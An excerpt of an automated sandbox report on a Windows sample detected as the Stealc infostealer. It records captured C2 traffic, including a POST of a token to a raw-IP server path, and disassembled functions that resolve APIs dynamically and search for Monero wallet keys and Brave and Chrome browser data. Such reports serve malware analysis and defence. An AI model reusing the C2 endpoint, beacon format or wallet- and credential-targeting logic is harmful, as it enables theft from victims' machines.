Sep 28, 2024 07:32:17.895179987 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:17 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2338 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Sep 28, 2024 07:32:17.896637917 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FBKFCFBFIDGCGDHJDBKF--
Sep 28, 2024 07:32:18.626184940 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 05:32:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	01:31:57
Start date:	28/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x3c0000
File size:	1'828'352 bytes
MD5 hash:	780720DD7E3B1CEC8E5DA391C946B80F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1917116646.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1689803053.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 003D9860 Relevance: 84.2, APIs: 33, Strings: 15, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00E632C0), ref: 003D98A1
GetProcAddress.KERNEL32(74DD0000,00E63320), ref: 003D98BA
GetProcAddress.KERNEL32(74DD0000,00E633F8), ref: 003D98D2
GetProcAddress.KERNEL32(74DD0000,00E63350), ref: 003D98EA
GetProcAddress.KERNEL32(74DD0000,00E63368), ref: 003D9903
GetProcAddress.KERNEL32(74DD0000,00E6A1B8), ref: 003D991B
GetProcAddress.KERNEL32(74DD0000,00E55710), ref: 003D9933
GetProcAddress.KERNEL32(74DD0000,00E55950), ref: 003D994C
GetProcAddress.KERNEL32(74DD0000,00E63158), ref: 003D9964
GetProcAddress.KERNEL32(74DD0000,00E63410), ref: 003D997C
GetProcAddress.KERNEL32(74DD0000,00E63248), ref: 003D9995
GetProcAddress.KERNEL32(74DD0000,00E63440), ref: 003D99AD
GetProcAddress.KERNEL32(74DD0000,00E55930), ref: 003D99C5
GetProcAddress.KERNEL32(74DD0000,00E63170), ref: 003D99DE
GetProcAddress.KERNEL32(74DD0000,00E63200), ref: 003D99F6
GetProcAddress.KERNEL32(74DD0000,00E55730), ref: 003D9A0E
GetProcAddress.KERNEL32(74DD0000,00E63218), ref: 003D9A27
GetProcAddress.KERNEL32(74DD0000,00E63188), ref: 003D9A3F
GetProcAddress.KERNEL32(74DD0000,00E55970), ref: 003D9A57
GetProcAddress.KERNEL32(74DD0000,00E631A0), ref: 003D9A70
GetProcAddress.KERNEL32(74DD0000,00E556B0), ref: 003D9A88
LoadLibraryA.KERNEL32(00E63458,?,003D6A00), ref: 003D9A9A
LoadLibraryA.KERNEL32(00E634B8,?,003D6A00), ref: 003D9AAB
LoadLibraryA.KERNEL32(00E63488,?,003D6A00), ref: 003D9ABD
LoadLibraryA.KERNEL32(00E634D0,?,003D6A00), ref: 003D9ACF
LoadLibraryA.KERNEL32(00E634E8,?,003D6A00), ref: 003D9AE0
GetProcAddress.KERNEL32(75A70000,00E63500), ref: 003D9B02
GetProcAddress.KERNEL32(75290000,00E63470), ref: 003D9B23
GetProcAddress.KERNEL32(75290000,00E634A0), ref: 003D9B3B
GetProcAddress.KERNEL32(75BD0000,00E63518), ref: 003D9B5D
GetProcAddress.KERNEL32(75450000,00E55790), ref: 003D9B7E
GetProcAddress.KERNEL32(76E90000,00E6A1D8), ref: 003D9B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 003D9BB6

Strings

h3, xrefs: 003D98F5
H2, xrefs: 003D9987
NtQueryInformationProcess, xrefs: 003D9BAA
0W, xrefs: 003D9A01
0Y, xrefs: 003D99B8
P3, xrefs: 003D98DD
PY, xrefs: 003D993E
X4, xrefs: 003D9A93
p1, xrefs: 003D99D0
X1, xrefs: 003D9957
3, xrefs: 003D98AC
4, xrefs: 003D9ADA
p4, xrefs: 003D9B16
pY, xrefs: 003D9A4A
@4, xrefs: 003D99A0

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: 3$0W$0Y$@4$H2$NtQueryInformationProcess$P3$PY$X1$X4$h3$p1$p4$pY$4
API String ID: 2238633743-2342062702
Opcode ID: f7f64bb08d55fdc157f6f47197bb236332026d57b89fa6c4699a23fa2dca3c78
Instruction ID: 4bac69f630e5d51d4f3c4832c1a6b039407da07100db837192906bd43b5a79c1
Opcode Fuzzy Hash: f7f64bb08d55fdc157f6f47197bb236332026d57b89fa6c4699a23fa2dca3c78
Instruction Fuzzy Hash: BFA10BBA5903409FD345EFE8FD88AA737FBF74C381714A61AE605C3264E6399841CB52

Function 003C45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 003C460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003C479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003C46B7

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 4a997e8f3d03c856ff7c07565a53eeac6c54a3c866ff0dd3f898b6bb00600094
Instruction ID: 271a282846f21ee8b6106daa2de8a642c4230c03eb7ad479417c8252c833ebcf
Opcode Fuzzy Hash: 4a997e8f3d03c856ff7c07565a53eeac6c54a3c866ff0dd3f898b6bb00600094
Instruction Fuzzy Hash: 274136246C379C6BE666BBA58CC2EFF73565F46B1CF90F244EE085A2C2CBB065014536

Function 003CBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,003E0B32,003E0B2B,00000000,?,?,?,003E13F4,003E0B2A), ref: 003CBEF5
StrCmpCA.SHLWAPI(?,003E13F8), ref: 003CBF4D
StrCmpCA.SHLWAPI(?,003E13FC), ref: 003CBF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 003CC7BF
FindClose.KERNEL32(000000FF), ref: 003CC7D1

Strings

Brave, xrefs: 003CC102
Preferences, xrefs: 003CC11E
\Brave\Preferences, xrefs: 003CC1DB
Google Chrome, xrefs: 003CC634

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 086e2c228e1f3b66318bbd8bdfddab80ad3fd079bad1fa2695769f84752d09c6
Instruction ID: 2167639c8c5853d8ff2ae90a705a8a4e41597c4eeeef4400199aaa98736f1b7c
Opcode Fuzzy Hash: 086e2c228e1f3b66318bbd8bdfddab80ad3fd079bad1fa2695769f84752d09c6
Instruction Fuzzy Hash: 8B4246739101085BCB16FBB0EE96EEE737DAB54300F404559F90A9A281EF349F49DB92

Function 6C5835A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C60F688,00001000), ref: 6C5835D5
